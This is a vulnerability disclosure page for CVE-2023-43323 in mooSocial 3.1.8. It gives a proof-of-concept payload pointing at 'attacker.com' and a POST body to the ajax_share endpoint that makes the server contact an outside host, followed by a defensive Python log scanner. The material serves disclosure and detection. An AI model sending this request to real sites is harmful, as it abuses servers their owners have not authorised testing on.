CVE-2023-43323 PoC: mooSocial Security Vulnerability

Source
Associated Vulnerability
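Title: mooSocial Security Vulnerability (CVE-2023-43323)
Description: mooSocial is a multi-platform, mobile-ready, user-friendly script from mooSocial, used to build community-driven content-sharing and social networking websites. mooSocial version 3.1.8 has a security vulnerability that stems from being susceptible to external service interaction.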
Description
mooSocial v3.1.8 is vulnerable to external service interaction in its post function.
Readme
# mooSocial: External HTTP and DNS Service Interaction (CVE-2023-43323)
mooSocial v3.1.8 is vulnerable to external service interaction in its post function. When the post is processed, the server sends an HTTP and DNS request to an external server.

Vulnerable parameters: **messageText**, **data[wall_photo]**, **data[userShareVideo]** and **data[userShareLink]**
## Exploit - Proof of Concept (POC)

### External HTTP and DNS Service Interaction
```
Payload : http://attacker.com/?null=
```
POST request to `/moosocial/activities/ajax_share` (request body only):
```
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
```


![image](https://github.com/ahrixia/CVE-2023-43323/assets/35935843/1f0ddaf9-8777-4b00-91e6-b66b062b817f)
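
For defenders reviewing web server or WAF logs, the following added example (not part of the original README or the mooSocial code base) parses urlencoded `ajax_share` request bodies and flags the four parameters named above when they carry URLs to hosts outside an allowlist. `ALLOWED_HOSTS`, the function names and the sample bodies are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the README lists as triggering outbound requests.
WATCHED = ("messageText", "data[wall_photo]",
           "data[userShareVideo]", "data[userShareLink]")
ALLOWED_HOSTS = {"www.youtube.com", "vimeo.com"}  # assumption: site policy
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "data%5Baction%5D=wall_post&messageText=hello&data%5BuserShareVideo%5D="
    "https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dabc",
    "data%5Baction%5D=wall_post&messageText=asas&data%5BuserShareVideo%5D="
    "http%3A%2F%2Funknown.example%2F%3Fnull",
    "data%5Baction%5D=wall_post&messageText=see+http%3A%2F%2F203.0.113.10%2Fx",
]


def host_verdict(host):
    """Return a reason string if the host should be flagged, else None."""
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return None if host in ALLOWED_HOSTS else "host not in allowlist"
    return "IP literal host"  # never expected in a shared link or video


def inspect_body(body):
    """Parse a urlencoded body; return [(param, url, reason), ...]."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)  # decodes %5B/%5D in keys
    for param in WATCHED:
        for value in fields.get(param, []):
            for url in URL_RE.findall(value):
                reason = host_verdict(urlsplit(url).hostname or "")
                if reason:
                    findings.append((param, url, reason))
    return findings


if __name__ == "__main__":
    for n, body in enumerate(SAMPLES, 1):
        for param, url, reason in inspect_body(body):
            print(f"sample {n}: {param} -> {url} ({reason})")
```

The same allowlist decision belongs on the server side before any outbound fetch is made; log review only tells you after the fact that a request reached the application.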